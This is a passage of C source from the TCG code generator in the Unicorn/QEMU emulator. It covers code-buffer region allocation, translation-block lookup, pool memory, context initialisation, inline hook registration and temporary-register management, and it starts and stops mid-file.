Currently they are used for qemu_ld/st instructions */ #define NO_CPU_IO_DEFS #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #if UINTPTR_MAX == UINT32_MAX # define ELF_CLASS ELFCLASS32 #else # define ELF_CLASS ELFCLASS64 #endif #ifdef HOST_WORDS_BIGENDIAN # define ELF_DATA ELFDATA2MSB #else # define ELF_DATA ELFDATA2LSB #endif #include "elf.h" #include "sysemu/sysemu.h" #include <uc_priv.h> /* Forward declarations for functions declared in tcg-target.inc.c and used here. */ static void tcg_target_init(TCGContext *s); static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode); static void tcg_target_qemu_prologue(TCGContext *s); static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend); /* The CIE and FDE header definitions will be common to all hosts. */ typedef struct { // uint32_t len __attribute__((aligned((sizeof(void *))))); uint32_t QEMU_ALIGN(8, len); uint32_t id; uint8_t version; char augmentation[1]; uint8_t code_align; uint8_t data_align; uint8_t return_column; } DebugFrameCIE; QEMU_PACK(typedef struct { // uint32_t len __attribute__((aligned((sizeof(void *))))); uint32_t QEMU_ALIGN(8, len); uint32_t cie_offset; uintptr_t func_start; uintptr_t func_len; }) DebugFrameFDEHeader; QEMU_PACK(typedef struct { DebugFrameCIE cie; DebugFrameFDEHeader fde; }) DebugFrameHeader; static QEMU_UNUSED_FUNC void tcg_register_jit_int(TCGContext *s, void *buf, size_t size, const void *debug_frame, size_t debug_frame_size); /* Forward declarations for functions declared and used in tcg-target.inc.c. */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type); static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg1, intptr_t arg2); static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg); static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg); static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args); #if TCG_TARGET_MAYBE_vec static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg src); static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg base, intptr_t offset); static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg dst, tcg_target_long arg); static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args); #else static inline bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg src) { g_assert_not_reached(); } static inline bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg base, intptr_t offset) { g_assert_not_reached(); } static inline void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg dst, tcg_target_long arg) { g_assert_not_reached(); } static inline void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { g_assert_not_reached(); } #endif static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2); static bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs); static void tcg_out_call(TCGContext *s, tcg_insn_unit *target); static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct); #ifdef TCG_TARGET_NEED_LDST_LABELS static int tcg_out_ldst_finalize(TCGContext *s); #endif #define TCG_HIGHWATER 1024 #if 
TCG_TARGET_INSN_UNIT_SIZE == 1 static QEMU_UNUSED_FUNC inline void tcg_out8(TCGContext *s, uint8_t v) { *s->code_ptr++ = v; } static QEMU_UNUSED_FUNC inline void tcg_patch8(tcg_insn_unit *p, uint8_t v) { *p = v; } #endif #if TCG_TARGET_INSN_UNIT_SIZE <= 2 static QEMU_UNUSED_FUNC inline void tcg_out16(TCGContext *s, uint16_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 2) { *s->code_ptr++ = v; } else { tcg_insn_unit *p = s->code_ptr; memcpy(p, &v, sizeof(v)); s->code_ptr = p + (2 / TCG_TARGET_INSN_UNIT_SIZE); } } static QEMU_UNUSED_FUNC inline void tcg_patch16(tcg_insn_unit *p, uint16_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 2) { *p = v; } else { memcpy(p, &v, sizeof(v)); } } #endif #if TCG_TARGET_INSN_UNIT_SIZE <= 4 static QEMU_UNUSED_FUNC inline void tcg_out32(TCGContext *s, uint32_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 4) { *s->code_ptr++ = v; } else { tcg_insn_unit *p = s->code_ptr; memcpy(p, &v, sizeof(v)); s->code_ptr = p + (4 / TCG_TARGET_INSN_UNIT_SIZE); } } static QEMU_UNUSED_FUNC inline void tcg_patch32(tcg_insn_unit *p, uint32_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 4) { *p = v; } else { memcpy(p, &v, sizeof(v)); } } #endif #if TCG_TARGET_INSN_UNIT_SIZE <= 8 static QEMU_UNUSED_FUNC inline void tcg_out64(TCGContext *s, uint64_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 8) { *s->code_ptr++ = v; } else { tcg_insn_unit *p = s->code_ptr; memcpy(p, &v, sizeof(v)); s->code_ptr = p + (8 / TCG_TARGET_INSN_UNIT_SIZE); } } static QEMU_UNUSED_FUNC inline void tcg_patch64(tcg_insn_unit *p, uint64_t v) { if (TCG_TARGET_INSN_UNIT_SIZE == 8) { *p = v; } else { memcpy(p, &v, sizeof(v)); } } #endif /* label relocation processing */ static void tcg_out_reloc(TCGContext *s, tcg_insn_unit *code_ptr, int type, TCGLabel *l, intptr_t addend) { TCGRelocation *r = tcg_malloc(s, sizeof(TCGRelocation)); r->type = type; r->ptr = code_ptr; r->addend = addend; QSIMPLEQ_INSERT_TAIL(&l->relocs, r, next); } static void tcg_out_label(TCGContext *s, TCGLabel *l, tcg_insn_unit *ptr) { tcg_debug_assert(!l->has_value); l->has_value = 1; l->u.value_ptr = ptr; } TCGLabel *gen_new_label(TCGContext *s) { TCGLabel *l = tcg_malloc(s, sizeof(TCGLabel)); memset(l, 0, sizeof(TCGLabel)); l->id = s->nb_labels++; QSIMPLEQ_INIT(&l->relocs); QSIMPLEQ_INSERT_TAIL(&s->labels, l, next); return l; } static bool tcg_resolve_relocs(TCGContext *s) { TCGLabel *l; QSIMPLEQ_FOREACH(l, &s->labels, next) { TCGRelocation *r; uintptr_t value = l->u.value; QSIMPLEQ_FOREACH(r, &l->relocs, next) { if (!patch_reloc(r->ptr, r->type, value, r->addend)) { return false; } } } return true; } static void set_jmp_reset_offset(TCGContext *s, int which) { size_t off = tcg_current_code_size(s); s->tb_jmp_reset_offset[which] = off; /* Make sure that we didn't overflow the stored offset. */ assert(s->tb_jmp_reset_offset[which] == off); } #include "tcg-target.inc.c" /* compare a pointer @ptr and a tb_tc @s */ static int ptr_cmp_tb_tc(const void *ptr, const struct tb_tc *s) { if ((char *)ptr >= (char *)s->ptr + s->size) { return 1; } else if (ptr < s->ptr) { return -1; } return 0; } static gint tb_tc_cmp(gconstpointer ap, gconstpointer bp) { const struct tb_tc *a = ap; const struct tb_tc *b = bp; /* * When both sizes are set, we know this isn't a lookup. * This is the most likely case: every TB must be inserted; lookups * are a lot less frequent. 
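 * Editor's note (illustrative): a lookup key has .size == 0 and carries a
 * host-code address in .ptr; ptr_cmp_tb_tc above then compares it against
 * the half-open interval [s->ptr, s->ptr + s->size), which is what lets
 * tcg_tb_lookup map any PC inside a TB's generated code back to that TB.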
*/ if (likely(a->size && b->size)) { if (a->ptr > b->ptr) { return 1; } else if (a->ptr < b->ptr) { return -1; } /* a->ptr == b->ptr should happen only on deletions */ g_assert(a->size == b->size); return 0; } /* * All lookups have either .size field set to 0. * From the glib sources we see that @ap is always the lookup key. However * the docs provide no guarantee, so we just mark this case as likely. */ if (likely(a->size == 0)) { return ptr_cmp_tb_tc(a->ptr, b); } return ptr_cmp_tb_tc(b->ptr, a); } void tcg_tb_insert(TCGContext *tcg_ctx, TranslationBlock *tb) { g_tree_insert(tcg_ctx->tree, &tb->tc, tb); } void tcg_tb_remove(TCGContext *tcg_ctx, TranslationBlock *tb) { g_tree_remove(tcg_ctx->tree, &tb->tc); } /* * Find the TB 'tb' such that * tb->tc.ptr <= tc_ptr < tb->tc.ptr + tb->tc.size * Return NULL if not found. */ TranslationBlock *tcg_tb_lookup(TCGContext *tcg_ctx, uintptr_t tc_ptr) { TranslationBlock *tb; struct tb_tc s = { .ptr = (void *)tc_ptr }; tb = g_tree_lookup(tcg_ctx->tree, &s); return tb; } void tcg_tb_foreach(TCGContext *tcg_ctx, GTraverseFunc func, gpointer user_data) { g_tree_foreach(tcg_ctx->tree, func, user_data); } size_t tcg_nb_tbs(TCGContext *tcg_ctx) { size_t nb_tbs = 0; nb_tbs = g_tree_nnodes(tcg_ctx->tree); return nb_tbs; } static void tcg_region_tree_reset_all(TCGContext *tcg_ctx) { g_tree_ref(tcg_ctx->tree); g_tree_destroy(tcg_ctx->tree); } static void tcg_region_bounds(TCGContext *tcg_ctx, size_t curr_region, void **pstart, void **pend) { char *start, *end; start = (char *)tcg_ctx->region.start_aligned + curr_region * tcg_ctx->region.stride; end = start + tcg_ctx->region.size; if (curr_region == 0) { start = tcg_ctx->region.start; } if (curr_region == tcg_ctx->region.n - 1) { end = tcg_ctx->region.end; } *pstart = start; *pend = end; } static void tcg_region_assign(TCGContext *s, size_t curr_region) { void *start, *end; tcg_region_bounds(s, curr_region, &start, &end); s->code_gen_buffer = start; s->code_gen_ptr = start; s->code_gen_buffer_size = (char *)end - (char *)start; memset(s->code_gen_buffer, 0x00, s->code_gen_buffer_size); s->code_gen_highwater = (char *)end - TCG_HIGHWATER; } static bool tcg_region_alloc__locked(TCGContext *s) { if (s->region.current == s->region.n) { return true; } tcg_region_assign(s, s->region.current); s->region.current++; return false; } /* * Request a new region once the one in use has filled up. * Returns true on error. */ static bool tcg_region_alloc(TCGContext *s) { bool err; /* read the region size now; alloc__locked will overwrite it on success */ size_t size_full = s->code_gen_buffer_size; err = tcg_region_alloc__locked(s); if (!err) { s->region.agg_size_full += size_full - TCG_HIGHWATER; } return err; } /* * Perform a context's first region allocation. * This function does _not_ increment region.agg_size_full. */ static inline bool tcg_region_initial_alloc__locked(TCGContext *s) { return tcg_region_alloc__locked(s); } /* Call from a safe-work context */ void tcg_region_reset_all(TCGContext *tcg_ctx) { tcg_ctx->region.current = 0; tcg_ctx->region.agg_size_full = 0; #ifndef NDEBUG bool err = tcg_region_initial_alloc__locked(tcg_ctx); g_assert(!err); #else tcg_region_initial_alloc__locked(tcg_ctx); #endif tcg_region_tree_reset_all(tcg_ctx); } /* * Initializes region partitioning. * * Called at init time from the parent thread (i.e. the one calling * tcg_context_init), after the target's TCG globals have been set. 
* * Region partitioning works by splitting code_gen_buffer into separate regions, * and then assigning regions to TCG threads so that the threads can translate * code in parallel without synchronization. * * In softmmu the number of TCG threads is bounded by max_cpus, so we use at * least max_cpus regions in MTTCG. In !MTTCG we use a single region. * Note that the TCG options from the command-line (i.e. -accel accel=tcg,[...]) * must have been parsed before calling this function, since it calls * qemu_tcg_mttcg_enabled(). * * In user-mode we use a single region. Having multiple regions in user-mode * is not supported, because the number of vCPU threads (recall that each thread * spawned by the guest corresponds to a vCPU thread) is only bounded by the * OS, and usually this number is huge (tens of thousands is not uncommon). * Thus, given this large bound on the number of vCPU threads and the fact * that code_gen_buffer is allocated at compile-time, we cannot guarantee * the availability of at least one region per vCPU thread. * * However, this user-mode limitation is unlikely to be a significant problem * in practice. Multi-threaded guests share most if not all of their translated * code, which makes parallel code generation less appealing than in softmmu. */ void tcg_region_init(TCGContext *tcg_ctx) { void *buf = tcg_ctx->code_gen_buffer; void *aligned; size_t size = tcg_ctx->code_gen_buffer_size; size_t page_size = tcg_ctx->uc->qemu_real_host_page_size; size_t region_size; size_t n_regions; size_t i; n_regions = 1; /* The first region will be 'aligned - buf' bytes larger than the others */ aligned = (void *)QEMU_ALIGN_PTR_UP(buf, page_size); g_assert((char *)aligned < ((char *)tcg_ctx->code_gen_buffer + size)); /* * Make region_size a multiple of page_size, using aligned as the start. * As a result of this we might end up with a few extra pages at the end of * the buffer; we will assign those to the last region. */ region_size = (size - ((char *)aligned - (char *)buf)) / n_regions; region_size = QEMU_ALIGN_DOWN(region_size, page_size); /* A region must have at least 2 pages; one code, one guard */ g_assert(region_size >= 2 * page_size); /* init the region struct */ tcg_ctx->region.n = n_regions; tcg_ctx->region.size = region_size - page_size; tcg_ctx->region.stride = region_size; tcg_ctx->region.start = buf; tcg_ctx->region.start_aligned = aligned; /* page-align the end, since its last page will be a guard page */ tcg_ctx->region.end = (void *)QEMU_ALIGN_PTR_DOWN((char *)buf + size, page_size); /* account for that last guard page */ tcg_ctx->region.end = (void *)((char *)tcg_ctx->region.end - page_size); /* set guard pages */ for (i = 0; i < tcg_ctx->region.n; i++) { void *start, *end; tcg_region_bounds(tcg_ctx, i, &start, &end); (void)qemu_mprotect_none(end, page_size); } tcg_ctx->tree = g_tree_new(tb_tc_cmp); } /* * Returns the size (in bytes) of all translated code (i.e. from all regions) * currently in the cache. * See also: tcg_code_capacity() * Do not confuse with tcg_current_code_size(); that one applies to a single * TCG context. */ size_t tcg_code_size(TCGContext *tcg_ctx) { size_t total; size_t size; total = tcg_ctx->region.agg_size_full; size = (char *)tcg_ctx->code_gen_ptr - (char *)tcg_ctx->code_gen_buffer; g_assert(size <= tcg_ctx->code_gen_buffer_size); total += size; return total; } /* * Returns the code capacity (in bytes) of the entire cache, i.e. including all * regions. 
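 * Editor's note (illustrative): capacity counts the whole buffer from
 * region.start to region.end plus the trailing guard, then subtracts one
 * guard page and one TCG_HIGHWATER slack area per region -- i.e. the
 * bytes that translated code could ever actually occupy.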
* See also: tcg_code_size() */ size_t tcg_code_capacity(TCGContext *tcg_ctx) { size_t guard_size, capacity; /* no need for synchronization; these variables are set at init time */ guard_size = tcg_ctx->region.stride - tcg_ctx->region.size; capacity = (char *)tcg_ctx->region.end + guard_size - (char *)tcg_ctx->region.start; capacity -= tcg_ctx->region.n * (guard_size + TCG_HIGHWATER); return capacity; } size_t tcg_tb_phys_invalidate_count(TCGContext *tcg_ctx) { size_t total = 0; total = tcg_ctx->tb_phys_invalidate_count; return total; } /* pool based memory allocation */ void *tcg_malloc_internal(TCGContext *s, int size) { TCGPool *p; int pool_size; if (size > TCG_POOL_CHUNK_SIZE) { /* big malloc: insert a new pool (XXX: could optimize) */ p = g_malloc(sizeof(TCGPool) + size); p->size = size; p->next = s->pool_first_large; s->pool_first_large = p; return p->data; } else { p = s->pool_current; if (!p) { p = s->pool_first; if (!p) goto new_pool; } else { if (!p->next) { new_pool: pool_size = TCG_POOL_CHUNK_SIZE; p = g_malloc(sizeof(TCGPool) + pool_size); p->size = pool_size; p->next = NULL; if (s->pool_current) s->pool_current->next = p; else s->pool_first = p; } else { p = p->next; } } } s->pool_current = p; s->pool_cur = p->data + size; s->pool_end = p->data + p->size; return p->data; } void tcg_pool_reset(TCGContext *s) { TCGPool *p, *t; for (p = s->pool_first_large; p; p = t) { t = p->next; g_free(p); } s->pool_first_large = NULL; s->pool_cur = s->pool_end = NULL; s->pool_current = NULL; } typedef struct TCGHelperInfo { void *func; const char *name; unsigned flags; unsigned sizemask; } TCGHelperInfo; #include "exec/helper-proto.h" static const TCGHelperInfo all_helpers[] = { #include "exec/helper-tcg.h" }; static const TCGOpDef tcg_op_defs_org[] = { #define DEF(s, oargs, iargs, cargs, flags) \ { #s, oargs, iargs, cargs, iargs + oargs + cargs, flags }, #include "tcg/tcg-opc.h" #undef DEF }; static void process_op_defs(TCGContext *s); static TCGTemp *tcg_global_reg_new_internal(TCGContext *s, TCGType type, TCGReg reg, const char *name); void uc_add_inline_hook(uc_engine *uc, struct hook *hk, void** args, int args_len) { TCGHelperInfo* info = g_malloc(sizeof(TCGHelperInfo)); char *name = g_malloc(64); unsigned sizemask = 0xFFFFFFFF; TCGContext *tcg_ctx = uc->tcg_ctx; GHashTable *helper_table = uc->tcg_ctx->helper_table; info->func = hk->callback; info->name = name; info->flags = 0; // From helper-head.h // Only UC_HOOK_BLOCK and UC_HOOK_CODE are generated into tcg code and can be inlined. 
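// Editor's note -- illustrative, not part of the original source:
// dh_sizemask(t, n) (from helper-head.h) packs two bits per argument
// slot -- is-64-bit and is-signed -- with slot 0 describing the return
// value, so the expression below simply encodes the uc_cb_hookcode_t
// signature (void ret, ptr uc, i64 address, i32 size, ptr user_data)
// for tcg_gen_callN's argument marshalling.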
switch (hk->type) { case UC_HOOK_BLOCK: case UC_HOOK_CODE: // (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); sizemask = dh_sizemask(void, 0) | dh_sizemask(ptr, 1) | dh_sizemask(i64, 2) | dh_sizemask(i32, 3) | dh_sizemask(ptr, 4); snprintf(name, 63, "hookcode_%d_%" PRIx64 , hk->type, (uint64_t)hk->callback); break; default: break; } name[63] = 0; info->name = name; info->sizemask = sizemask; g_hash_table_insert(helper_table, (gpointer)info->func, (gpointer)info); g_hash_table_insert(uc->tcg_ctx->custom_helper_infos, (gpointer)info->func, (gpointer)info); tcg_gen_callN(tcg_ctx, info->func, NULL, args_len, (TCGTemp**)args); } static void uc_free_inline_hook_info(void *p) { TCGHelperInfo *info = (TCGHelperInfo *)p; g_free((void*)(info->name)); g_free(info); } void uc_del_inline_hook(uc_engine *uc, struct hook *hk) { g_hash_table_remove(uc->tcg_ctx->custom_helper_infos, hk->callback); } void tcg_context_init(TCGContext *s) { int op, total_args, n, i; TCGOpDef *def; TCGArgConstraint *args_ct; int *sorted_args; TCGTemp *ts; GHashTable *helper_table; memset(s, 0, sizeof(*s)); s->nb_globals = 0; // copy original tcg_op_defs_org for private usage s->tcg_op_defs = g_malloc0(sizeof(tcg_op_defs_org)); memcpy(s->tcg_op_defs, tcg_op_defs_org, sizeof(tcg_op_defs_org)); /* Count total number of arguments and allocate the corresponding space */ total_args = 0; for(op = 0; op < NB_OPS; op++) { def = &s->tcg_op_defs[op]; n = def->nb_iargs + def->nb_oargs; total_args += n; } args_ct = g_malloc0(sizeof(TCGArgConstraint) * total_args); sorted_args = g_malloc0(sizeof(int) * total_args); for(op = 0; op < NB_OPS; op++) { def = &s->tcg_op_defs[op]; def->args_ct = args_ct; def->sorted_args = sorted_args; n = def->nb_iargs + def->nb_oargs; sorted_args += n; args_ct += n; } /* Register helpers. */ /* Use g_direct_hash/equal for direct pointer comparisons on func. */ helper_table = g_hash_table_new(NULL, NULL); s->helper_table = helper_table; // Unicorn: Store our custom inline hooks information s->custom_helper_infos = g_hash_table_new_full(NULL, NULL, NULL, uc_free_inline_hook_info); for (i = 0; i < ARRAY_SIZE(all_helpers); ++i) { g_hash_table_insert(helper_table, (gpointer)all_helpers[i].func, (gpointer)&all_helpers[i]); } tcg_target_init(s); process_op_defs(s); /* Reverse the order of the saved registers, assuming they're all at the start of tcg_target_reg_alloc_order. */ for (n = 0; n < ARRAY_SIZE(tcg_target_reg_alloc_order); ++n) { int r = tcg_target_reg_alloc_order[n]; if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, r)) { break; } } n = ARRAY_SIZE(tcg_target_reg_alloc_order); s->indirect_reg_alloc_order = g_malloc(sizeof(int) * n); for (i = 0; i < n; ++i) { s->indirect_reg_alloc_order[i] = tcg_target_reg_alloc_order[n - 1 - i]; } for (; i < ARRAY_SIZE(tcg_target_reg_alloc_order); ++i) { s->indirect_reg_alloc_order[i] = tcg_target_reg_alloc_order[i]; } s->one_entry = g_malloc(sizeof(struct jit_code_entry)); s->one_entry->symfile_addr = NULL; tcg_debug_assert(!tcg_regset_test_reg(s->reserved_regs, TCG_AREG0)); ts = tcg_global_reg_new_internal(s, TCG_TYPE_PTR, TCG_AREG0, "env"); s->cpu_env = temp_tcgv_ptr(s, ts); } /* * Allocate TBs right before their corresponding translated code, making * sure that TBs and code are on different cache lines. 
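 * Editor's note (illustrative): the allocation below lays out
 *   [TranslationBlock][pad to icache line][generated code ...]
 * with both ROUND_UPs using the host icache line size, so the TB
 * metadata (data-cache traffic) and its code (instruction fetch) never
 * share a cache line.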
*/ TranslationBlock *tcg_tb_alloc(TCGContext *s) { uintptr_t align = s->uc->qemu_icache_linesize; TranslationBlock *tb; void *next; retry: tb = (void *)ROUND_UP((uintptr_t)s->code_gen_ptr, align); next = (void *)ROUND_UP((uintptr_t)(tb + 1), align); if (unlikely(next > s->code_gen_highwater)) { if (tcg_region_alloc(s)) { return NULL; } goto retry; } s->code_gen_ptr = next; s->data_gen_ptr = NULL; return tb; } void tcg_prologue_init(TCGContext *s) { size_t prologue_size, total_size; void *buf0, *buf1; /* Put the prologue at the beginning of code_gen_buffer. */ buf0 = s->code_gen_buffer; total_size = s->code_gen_buffer_size; s->code_ptr = buf0; s->code_buf = buf0; s->data_gen_ptr = NULL; s->code_gen_prologue = buf0; /* Compute a high-water mark, at which we voluntarily flush the buffer and start over. The size here is arbitrary, significantly larger than we expect the code generation for any one opcode to require. */ s->code_gen_highwater = (char *)s->code_gen_buffer + (total_size - TCG_HIGHWATER) - s->uc->qemu_real_host_page_size; #ifdef TCG_TARGET_NEED_POOL_LABELS s->pool_labels = NULL; #endif /* Generate the prologue. */ tcg_target_qemu_prologue(s); #ifdef TCG_TARGET_NEED_POOL_LABELS /* Allow the prologue to put e.g. guest_base into a pool entry. */ { int result = tcg_out_pool_finalize(s); tcg_debug_assert(result == 0); } #endif buf1 = s->code_ptr; flush_icache_range((uintptr_t)buf0, (uintptr_t)buf1); /* Deduct the prologue from the buffer. */ prologue_size = tcg_current_code_size(s); s->code_gen_ptr = buf1; s->code_gen_buffer = buf1; s->code_buf = buf1; total_size -= prologue_size; s->code_gen_buffer_size = total_size; tcg_register_jit(s, s->code_gen_buffer, total_size); /* Assert that goto_ptr is implemented completely. */ if (TCG_TARGET_HAS_goto_ptr) { tcg_debug_assert(s->code_gen_epilogue != NULL); } } void tcg_func_start(TCGContext *s) { tcg_pool_reset(s); s->nb_temps = s->nb_globals; /* No temps have been previously allocated for size or locality. */ memset(s->free_temps, 0, sizeof(s->free_temps)); s->nb_ops = 0; s->nb_labels = 0; s->current_frame_offset = s->frame_start; #ifdef CONFIG_DEBUG_TCG s->goto_tb_issue_mask = 0; #endif QTAILQ_INIT(&s->ops); QTAILQ_INIT(&s->free_ops); QSIMPLEQ_INIT(&s->labels); } static inline TCGTemp *tcg_temp_alloc(TCGContext *s) { int n = s->nb_temps++; tcg_debug_assert(n < TCG_MAX_TEMPS); return memset(&s->temps[n], 0, sizeof(TCGTemp)); } static inline TCGTemp *tcg_global_alloc(TCGContext *s) { TCGTemp *ts; tcg_debug_assert(s->nb_globals == s->nb_temps); s->nb_globals++; ts = tcg_temp_alloc(s); ts->temp_global = 1; return ts; } static TCGTemp *tcg_global_reg_new_internal(TCGContext *s, TCGType type, TCGReg reg, const char *name) { TCGTemp *ts; if (TCG_TARGET_REG_BITS == 32 && type != TCG_TYPE_I32) { tcg_abort(); } ts = tcg_global_alloc(s); ts->base_type = type; ts->type = type; ts->fixed_reg = 1; ts->reg = reg; ts->name = name; tcg_regset_set_reg(s->reserved_regs, reg); return ts; } void tcg_set_frame(TCGContext *s, TCGReg reg, intptr_t start, intptr_t size) { s->frame_start = start; s->frame_end = start + size; s->frame_temp = tcg_global_reg_new_internal(s, TCG_TYPE_PTR, reg, "_frame"); } TCGTemp *tcg_global_mem_new_internal(TCGContext *s, TCGType type, TCGv_ptr base, intptr_t offset, const char *name) { TCGTemp *base_ts = tcgv_ptr_temp(s, base); TCGTemp *ts = tcg_global_alloc(s); int indirect_reg = 0, bigendian = 0; #ifdef HOST_WORDS_BIGENDIAN bigendian = 1; #endif if (!base_ts->fixed_reg) { /* We do not support double-indirect registers. 
*/ tcg_debug_assert(!base_ts->indirect_reg); base_ts->indirect_base = 1; s->nb_indirects += (TCG_TARGET_REG_BITS == 32 && type == TCG_TYPE_I64 ? 2 : 1); indirect_reg = 1; } if (TCG_TARGET_REG_BITS == 32 && type == TCG_TYPE_I64) { TCGTemp *ts2 = tcg_global_alloc(s); char buf[64]; ts->base_type = TCG_TYPE_I64; ts->type = TCG_TYPE_I32; ts->indirect_reg = indirect_reg; ts->mem_allocated = 1; ts->mem_base = base_ts; ts->mem_offset = offset + bigendian * 4; pstrcpy(buf, sizeof(buf), name); pstrcat(buf, sizeof(buf), "_0"); ts->name = g_strdup(buf); tcg_debug_assert(ts2 == ts + 1); ts2->base_type = TCG_TYPE_I64; ts2->type = TCG_TYPE_I32; ts2->indirect_reg = indirect_reg; ts2->mem_allocated = 1; ts2->mem_base = base_ts; ts2->mem_offset = offset + (1 - bigendian) * 4; pstrcpy(buf, sizeof(buf), name); pstrcat(buf, sizeof(buf), "_1"); ts2->name = g_strdup(buf); } else { ts->base_type = type; ts->type = type; ts->indirect_reg = indirect_reg; ts->mem_allocated = 1; ts->mem_base = base_ts; ts->mem_offset = offset; ts->name = name; } return ts; } TCGTemp *tcg_temp_new_internal(TCGContext *s, TCGType type, bool temp_local) { TCGTemp *ts; int idx, k; k = type + (temp_local ? TCG_TYPE_COUNT : 0); idx = find_first_bit(s->free_temps[k].l, TCG_MAX_TEMPS); if (idx < TCG_MAX_TEMPS) { /* There is already an available temp with the right type. */ clear_bit(idx, s->free_temps[k].l); ts = &s->temps[idx]; ts->temp_allocated = 1; tcg_debug_assert(ts->base_type == type); tcg_debug_assert(ts->temp_local == temp_local); } else { ts = tcg_temp_alloc(s); if (TCG_TARGET_REG_BITS == 32 && type == TCG_TYPE_I64) { TCGTemp *ts2 = tcg_temp_alloc(s); ts->base_type = type; ts->type = TCG_TYPE_I32; ts->temp_allocated = 1; ts->temp_local = temp_local; tcg_debug_assert(ts2 == ts + 1); ts2->base_type = TCG_TYPE_I64; ts2->type = TCG_TYPE_I32; ts2->temp_allocated = 1; ts2->temp_local = temp_local; } else { ts->base_type = type; ts->type = type; ts->temp_allocated = 1; ts->temp_local = temp_local; } } #if defined(CONFIG_DEBUG_TCG) s->temps_in_use++; #endif return ts; } TCGv_vec tcg_temp_new_vec(TCGContext *tcg_ctx, TCGType type) { TCGTemp *t; #ifdef CONFIG_DEBUG_TCG switch (type) { case TCG_TYPE_V64: assert(TCG_TARGET_HAS_v64); break; case TCG_TYPE_V128: assert(TCG_TARGET_HAS_v128); break; case TCG_TYPE_V256: assert(TCG_TARGET_HAS_v256); break; default: g_assert_not_reached(); } #endif t = tcg_temp_new_internal(tcg_ctx, type, 0); return temp_tcgv_vec(tcg_ctx, t); } /* Create a new temp of the same type as an existing temp. */ TCGv_vec tcg_temp_new_vec_matching(TCGContext *tcg_ctx, TCGv_vec match) { TCGTemp *t = tcgv_vec_temp(tcg_ctx, match); tcg_debug_assert(t->temp_allocated != 0); t = tcg_temp_new_internal(tcg_ctx, t->base_type, 0); return temp_tcgv_vec(tcg_ctx, t); } void tcg_temp_free_internal(TCGContext *s, TCGTemp *ts) { int k, idx; #if defined(CONFIG_DEBUG_TCG) s->temps_in_use--; if (s->temps_in_use < 0) { fprintf(stderr, "More temporaries freed than allocated!\n"); } #endif tcg_debug_assert(ts->temp_global == 0); tcg_debug_assert(ts->temp_allocated != 0); ts->temp_allocated = 0; idx = temp_idx(s, ts); k = ts->base_type + (ts->temp_local ? 
TCG_TYPE_COUNT : 0); set_bit(idx, s->free_temps[k].l); } TCGv_i32 tcg_const_i32(TCGContext *tcg_ctx, int32_t val) { TCGv_i32 t0; t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, val); return t0; } TCGv_i64 tcg_const_i64(TCGContext *tcg_ctx, int64_t val) { TCGv_i64 t0; t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, val); return t0; } TCGv_i32 tcg_const_local_i32(TCGContext *tcg_ctx, int32_t val) { TCGv_i32 t0; t0 = tcg_temp_local_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, val); return t0; } TCGv_i64 tcg_const_local_i64(TCGContext *tcg_ctx, int64_t val) { TCGv_i64 t0; t0 = tcg_temp_local_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, val); return t0; } #if defined(CONFIG_DEBUG_TCG) void tcg_clear_temp_count(TCGContext *s) { s->temps_in_use = 0; } int tcg_check_temp_count(TCGContext *s) { if (s->temps_in_use) { /* Clear the count so that we don't give another * warning immediately next time around. */ s->temps_in_use = 0; return 1; } return 0; } #endif /* Return true if OP may appear in the opcode stream. Test the runtime variable that controls each opcode. */ bool tcg_op_supported(TCGOpcode op) { const bool have_vec = TCG_TARGET_HAS_v64 | TCG_TARGET_HAS_v128 | TCG_TARGET_HAS_v256; switch (op) { case INDEX_op_discard: case INDEX_op_set_label: case INDEX_op_call: case INDEX_op_br: case INDEX_op_mb: case INDEX_op_insn_start: case INDEX_op_exit_tb: case INDEX_op_goto_tb: case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_st_i32: case INDEX_op_qemu_ld_i64: case INDEX_op_qemu_st_i64: return true; case INDEX_op_goto_ptr: return TCG_TARGET_HAS_goto_ptr; case INDEX_op_mov_i32: case INDEX_op_movi_i32: case INDEX_op_setcond_i32: case INDEX_op_brcond_i32: case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_add_i32: case INDEX_op_sub_i32: case INDEX_op_mul_i32: case INDEX_op_and_i32: case INDEX_op_or_i32: 